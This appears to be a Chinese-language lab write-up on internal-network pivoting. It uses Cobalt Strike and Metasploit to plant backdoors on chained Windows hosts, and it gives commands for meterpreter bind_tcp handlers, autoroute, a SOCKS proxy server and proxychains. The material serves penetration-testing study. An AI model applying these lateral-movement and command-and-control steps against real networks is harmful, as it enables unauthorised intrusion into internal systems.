目录
案例一:网络通讯&控制上线--CS-路由添加&节点建立&协议生成&正反连接
案例二:网络通讯&控制上线--MSF-路由添加&节点建立&协议生成&正反连接
思维导图
环境配置
这里由于系统内存问题我只设置三台主机,kali充当外网主机

win2019
网卡设置

ip地址

win2008
网卡设置
ip地址

win7网卡设置

ip

确保主机两两之间可以互相ping通
kali ping win2019

win2019 ping win2008

win2008 ping win7

不用来回ping因为ping是相互的,有来有回
案例一:网络通讯&控制上线--CS-路由添加&节点建立&协议生成&正反连接
首先先生成木马在让win2019进行上线

需要设置sockets代理让2019转发一个端口给kali,kali通过代理工具连接这个端口来进行win2008的控制

设置sockets连接


kali设置代理规则,工具为proxychains4为kali自带的,这里是因为我是kali系统,如果是windows,建议使用Proxifier,图形化界面便于操作
工具使用教程
安装完成后,ProxyChains的配置文件通常位于/etc/proxychains.conf或/etc/proxychains4.conf。你需要编辑这个文件来添加你的代理服务器信息。
打开配置文件:
bash
sudo nano /etc/proxychains4.conf # 假设你安装了proxychains4
或者
sudo nano /etc/proxychains.conf
在文件的末尾找到[ProxyList]部分,并添加你的代理服务器信息。格式通常为:
协议类型 代理服务器IP地址 端口号 [用户名 密码]
例如,如果你有一个SOCKS5代理,IP地址为123.123.123.123,端口号为1080,则添加如下行:
socks5 123.123.123.123 1080
如果需要用户名和密码进行身份验证,则添加相应的用户名和密码:
socks5 123.123.123.123 1080 用户名 密码
保存并关闭配置文件。
三、使用ProxyChains
配置完成后,你就可以通过ProxyChains来使用代理服务器了。ProxyChains的使用非常简单,只需在要运行的命令前加上proxychains4(或proxychains,取决于你安装的版本)即可。
例如,如果你想通过代理服务器访问Google,可以使用curl命令:
bash
proxychains4 curl https://www.google.com
如果没有proxychains4需要自己进行安装,更改/etc/proxychains4.conf文件

因为刚才socket连接为socks4所以这里设置时也需设置为socks4

配置规则
socks4/5 ip 端口

利用 proxychains4 curl win2008IP地址 访问这个地址的网页:启动了phpstudy,可以成功访问了

这里访问页面可以访问成功但是ping不通,个人理解是通过win2019开的口子,能与win2008建立通讯,http不需要建立持久的连接,连接之后返回数据断开即可,通过win2019把数据反回来,而ping虽然数据包可以发送出去,但是在win2008并未设置到kali的路由不知道往哪里发送所以会卡住
现在需要通过cs中2019正向连接win2008因为win2008无法与kali建立连接,只能与win2019连接
操作方法
生成一个新的正向连接的监听器和木马

生成新的后门需要选用加s的模块

上传后门并且执行,因为需要正向连接所以需要win2019输入
connect win2008ip 木马端口
win2008成功上线

连接win7同样的木马直接上传运行,通过win2008连接

连接完成后拓扑图结构

现在再试一下给通过win2008给kali添加win7的节点路由,以此来访问win7的页面
添加节点

添加代理

访问20.20.20.2(iis)

案例二:网络通讯&控制上线--MSF-路由添加&节点建立&协议生成&正反连接
这里我直接先利用msf全部控制,再弄路由添加建立节点来访问页面
首先生成木马,开启监听


然后执行木马上线win2019


msf虽然也是通过win2019正向连接,但是不是通过2019会话进行的,是通过win2019生成路由,让kali直接用msf进行连接的,
通过win2019添加路由
run autoroute -p
run post/multi/manage/autoroute

把会话放入后台

使用正向连接模块,进行连接,这里端口需设置为lport,不能与会话一端口一致
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 10.10.10.2
set lport 3333
run
生成正向连接木马

上传,msf使用正向连接模块

再以win2008生成路由

把会话放入后台

继续上传刚才的木马进行正向连接


这个时候如果是msf与他建立了完整的连接,如果需要kali主机与他们建立连接,则需要通过socket连接生成节点,通过代理连接这个节点以此访问,代理端口为1111
use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1111
run

配置代理,msf-socks默认为socks5

这里不同于cs的是设置一个节点就可以访问所有可以互相访问的主机
访问win2008,phpstudy

访问win7-iis

如果是windows系统的话可以使用更为方便的图形化工具Proxifier

直接设置代理所有
